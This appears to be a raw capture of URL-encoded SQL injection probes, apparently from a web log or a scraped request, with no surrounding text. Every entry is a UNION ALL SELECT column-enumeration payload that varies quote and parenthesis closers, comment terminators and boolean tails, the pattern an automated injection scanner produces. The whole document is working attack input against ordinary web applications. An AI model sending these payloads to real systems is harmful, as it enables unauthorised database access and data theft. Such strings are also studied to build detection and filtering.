1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -8609%29%20UNION%20ALL%20SELECT%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%2C%205203%23 -2925%29%20UNION%20ALL%20SELECT%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%2C%204704%23 -9785%29%20UNION%20ALL%20SELECT%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%2C%205546%23 -6763%29%20UNION%20ALL%20SELECT%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%23 -3783%29%20UNION%20ALL%20SELECT%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%23 -9398%29%20UNION%20ALL%20SELECT%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%2C%204684%23 -7305%29%20UNION%20ALL%20SELECT%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%23 -8073%29%20UNION%20ALL%20SELECT%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%2C%208379%23 -5125%29%20UNION%20ALL%20SELECT%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%23 -9431%29%20UNION%20ALL%20SELECT%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%2C%204874%23 -7275%27%29%20UNION%20ALL%20SELECT%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%23 -1952%27%29%20UNION%20ALL%20SELECT%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%23 -2663%27%29%20UNION%20ALL%20SELECT%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%23 -9620%27%29%20UNION%20ALL%20SELECT%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%23 -1663%27%29%20UNION%20ALL%20SELECT%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%2C%203975%23 -9729%27%29%20UNION%20ALL%20SELECT%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%23 -6114%27%29%20UNION%20ALL%20SELECT%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%2C%205988%23 -8237%27%29%20UNION%20ALL%20SELECT%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%23 -4572%27%29%20UNION%20ALL%20SELECT%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%2C%201892%23 -7237%27%29%20UNION%20ALL%20SELECT%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%2C%203405%23 -3997%27%20UNION%20ALL%20SELECT%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%23 -2734%27%20UNION%20ALL%20SELECT%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%2C%207519%23 -7860%27%20UNION%20ALL%20SELECT%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%23 -9955%27%20UNION%20ALL%20SELECT%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%2C%208566%23 -9780%27%20UNION%20ALL%20SELECT%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%2C%202823%23 -1835%27%20UNION%20ALL%20SELECT%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%2C%205165%23 -7382%27%20UNION%20ALL%20SELECT%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%2C%207002%23 -7054%27%20UNION%20ALL%20SELECT%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%23 -2144%27%20UNION%20ALL%20SELECT%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%23 -9824%27%20UNION%20ALL%20SELECT%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%2C%207121%23 -1311%22%20UNION%20ALL%20SELECT%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%23 -6572%22%20UNION%20ALL%20SELECT%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%23 -1518%22%20UNION%20ALL%20SELECT%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%23 -1216%22%20UNION%20ALL%20SELECT%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%23 -8261%22%20UNION%20ALL%20SELECT%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%2C%205268%23 -6861%22%20UNION%20ALL%20SELECT%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%2C%203336%23 -6290%22%20UNION%20ALL%20SELECT%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%23 -9359%22%20UNION%20ALL%20SELECT%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%23 -8702%22%20UNION%20ALL%20SELECT%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%23 -7403%22%20UNION%20ALL%20SELECT%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%23 -9275%29%20UNION%20ALL%20SELECT%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%2C%209067%23%20AND%20%283555%3D3555 -5323%29%20UNION%20ALL%20SELECT%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%2C%201827%23%20AND%20%288183%3D8183 -6807%29%20UNION%20ALL%20SELECT%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%2C%204963%23%20AND%20%282394%3D2394 -3763%29%20UNION%20ALL%20SELECT%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%23%20AND%20%281598%3D1598 -2332%29%20UNION%20ALL%20SELECT%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%23%20AND%20%282764%3D2764 -8426%29%20UNION%20ALL%20SELECT%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%2C%204549%23%20AND%20%283160%3D3160 -8094%29%20UNION%20ALL%20SELECT%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%2C%208187%23%20AND%20%283645%3D3645 